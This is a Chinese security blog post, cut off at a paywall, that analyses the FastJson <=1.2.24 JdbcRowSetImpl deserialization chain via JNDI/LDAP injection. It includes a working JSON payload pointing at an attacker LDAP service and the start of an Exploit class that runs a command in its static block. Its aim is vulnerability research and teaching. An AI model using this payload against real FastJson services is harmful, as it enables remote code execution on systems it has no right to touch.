FastJson<=1.2.24 JdbcRowSetImpl利用链分析

最新推荐文章于 2024-07-27 18:27:11 发布
最新推荐文章于 2024-07-27 18:27:11 发布
阅读量3.3k 收藏 1
点赞数 1
文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/122216141
版权
本文详细分析了FastJson 1.2.24及以下版本中的JdbcRowSetImpl利用链,指出该链利用JNDI注入,通过setAutoCommit方法触发InitialContext.lookup,实现命令执行。分析了payload中的参数,如@type、dataSourceName、autoCommit等,并探讨了不同版本的FastJson中的防御策略及其绕过方法。
摘要由CSDN通过智能技术生成

前言
上文分析了TemplatesImpl利用链,对fastjson parseObject函数进行了分析,明白了整个触发漏洞的流程,接着来学习JdbcRowSetImpl 利用链,JdbcRowSetImpl的利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。这条链主要利用了setAutoCommit方法调用InitialContext.lookup并且参数是未经过滤dataSourceName,导致JNDI注入,造成命令执行。其中涉及了JDNI注入 + RMI/LDAP 的知识,再前文也简单分析过JNDI+RMI/JNDI+LDAP的利用,如果不明白可以参考前文JNDI注入(RMI攻击实现和LDAP攻击实现)
JdbcRowSetImpl限制条件
主要限制的因素是jdk版本,个人版本为jdk1.8.0_121

基于RMI利用的JDK版本 ≤ 6u141、7u131、8u121
基于LDAP利用的JDK版本 ≤ 6u211、7u201、8u191。

在这里插入图片描述
攻击流程

首先是这个lookup(URI)参数可控
攻击者控制URI参数为指定为恶意的一个RMI服务
攻击者RMI服务器向目标返回一个Reference对象,Reference对象中指定某个精心构造的Factory类;
目标在进行lookup()操作时,会动态加载并实例化Factory类,接着调用factory.getObjectInstance()获取外部远程对象实例;
攻击者可以在Factory类文件的静态代码块处写入恶意代码,达到RCE的效果;

源码分析
影响版本:fastjson<=1.2.24
payload:

{"@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://127.0.0.1:1389/#Exploit", "autoCommit":true}

Exploit代码,需要编译成class文件放到web服务中去:

import java.io.IOException;

public class Exploit {
    public Exploit() {
    }
    static {
        try {         
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
最低0.47元/天 解锁文章
郭晓雷
关注
FastJson JdbcRowSetImpl 链分析
Vicl1fe的博客
07-17 660
前言 继续跟着大佬学习fastjson利用链。之前写了fastjson TemplateImple利用链。里面分析了fastjson的一些数据流向。 对于JdbcRowSetImpl链。这个链基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。 环境 jdk1.8_102 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</arti
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1189
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
Fastjson JdbcRowSetImpl利用链学习
虚幻私塾
04-15 1450
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
Fastjson 反序列化 Jndi 注入利用 JdbcRowSetImpl
Love&Share
02-26 5453
文章目录Fastjson 反序列化Fastjson 组件使用案例漏洞原理Jndi注入利用JdbcRowSetImpl链原理复现调试高级利用-推荐阅读Fastjson姿势技巧fastjson检测参考文章 Fastjson 反序列化 Fastjson 组件是阿里巴巴开发的反序列化与序列化组件 Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因: Fastjson 提供了反序列化功能,允许用户在输入 JSON 串时通过 “@type” 键对应的 value 指定任意反序列化类名 Fastj.
fastjson反序列化漏洞原理及=1.2.24&=1.2.47&Fastjson v1.2.80简单利用&不出网判断&修复方法
最新发布
m0_70535581的博客
07-27 1635
fastjson 是一个 有阿里开发的一个开源Java 类库,可以将 Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
[Java安全]fastjson1.2.24结合JdbcRowSetImpl利用
Y4tacker的博客
07-15 338
https://zhuanlan.zhihu.com/p/73428357 https://blog.csdn.net/further_eye/article/details/109718241 https://www.freebuf.com/vuls/208339.html
fastjson反序列化JdbcRowSetImpl
weixin_30596735的博客
12-28 406
Gadget com.sun.rowset.JdbcRowSetImpl setAutoCommit() -> connect() -> InitialContext.lookup() poc如下,dataSourceName 为rmi://localhost:1090/evil: String payload = "{\"@type\":\"Lcom.s...
fastjson 1.2.24反序列化漏洞
weixin_68547367的博客
01-04 1267
fastjson是一个Java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到了极致,它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。在网络传输的过程中,RMI中的对象是通过序列化方式进行编码传输的,这意味着,RMI在接收到经过序列化编码的对象后进行反序列化。java.io.Serializable:表示序列化,是一个空接口,也就是说这个接口没有声明任何的方法,所以实现这个接口的类也就不需要实现任何的方法。
JAVA详细思路|Java安全FastJson JdbcRowSetImpl 链分析
m0_57227221的博客
05-17 1083
Java安全FastJson JdbcRowSetImpl 链分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用链, JdbcRowSetImpl利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1557
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
sun.jdbc.rowset
10-16
网上找了很多 下载下来都是com.sun.rowset 这个是正确的sun.jdbc.rowset
sun.jdbc.rowset的jar包
06-17
sun.jdbc.rowset的jar包,2000年的老包。不过有些老项目需要。 包括sun.jdbc.rowset.CachedRowSet
fastjson反序列化JdbcRowSetImpl
qq_40710190的博客
07-08 379
fastjson利用
Web】速谈FastJson反序列化中JdbcRowSetImpl利用
uuzeray的博客
03-03 714
继续看connect方法,显然conn为空且我们有DataSourceName属性,进到else if的分支,调用(new InitialContext()).lookup(),经典何须多言,只要dataSourceName设为恶意远程RMI服务或LDAP服务打JNDI即可。fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,其原理就是setter的自动调用。开一个恶意LDAP服务器。找个端口放恶意字节码。
JDK 1.5学习之RowSet
代码人生
03-19 1211
在jdk1.4的javax.sql包中有一个RowSet接口,但是没有具体实现的类。"Tiger"诞生之后,引入了  javax.sql.rowset包中的五个子接口和com.sun.rowset包里面的对应的五个实现类,这样我们就可是使用功能强大的 RowSet 了。jdk1.5中RowSet的五个子接口分别是JdbcRowSet,CachedRowSet,WebRowSet, JoinRowS
Java反序列化6-Fastjson JdbcRowSetImpl 链及后续漏洞分析
weixin_43263451的博客
07-18 1527
上一节讲了TemplatesImpl链的利用方式,但是呢其局限性较大需要后端开启Feature.SupportNonPublicField且因为Feature.SupportNonPublicField是在fastjson1.2.22版本才引入所以只影响1.2.22-1.2.24版本fastjson这里的JdbcRowSetImpl链比TemplatesImpl利用范围更大一点后面版本的fastjson漏洞都是在绕过黑名单,所以在本文中一次全部陈述总结前言.前言.前言。............
1.2.24 Fastjson反序列化TemplatesImplJdbcRowSetImpl利用链分析(非常详细)
dreamthe的博客
07-07 2285
本文的关于Fastjson1.2.24版本TemplatesImpl利用链的分析非常详细,如果你不是很熟悉该利用链,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
Java代码审计——Fastjson JdbcRowSetImpl调用链
王嘟嘟的博客
12-09 1235
0x00 前言 反序列化总纲 单独的把fastjson的调用链拎出来进行分析。 fastjson可参考:https://blog.csdn.net/qq_36869808/article/details/121697765?spm=1001.2014.3001.5501 0x01 JdbcRowSetImpl 这里要是需要使用JNDI就必须通过lookup方法,这个参考:待填坑。 首先来看fastjson payload,有两个参数:一个是dataSourceName,另外一个是autoCommit {"@
fastjson <= 1.2.80 反序列化任意代码执行漏洞
09-02
fastjson <= 1.2.80 存在反序列化任意代码执行漏洞。该漏洞利用黑白名单防御机制的绕过,即使autoType关闭也可能导致远程命令执行漏洞。这个漏洞的利用门槛较低,可以绕过默认限制攻击远程服务器,风险影响较大。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值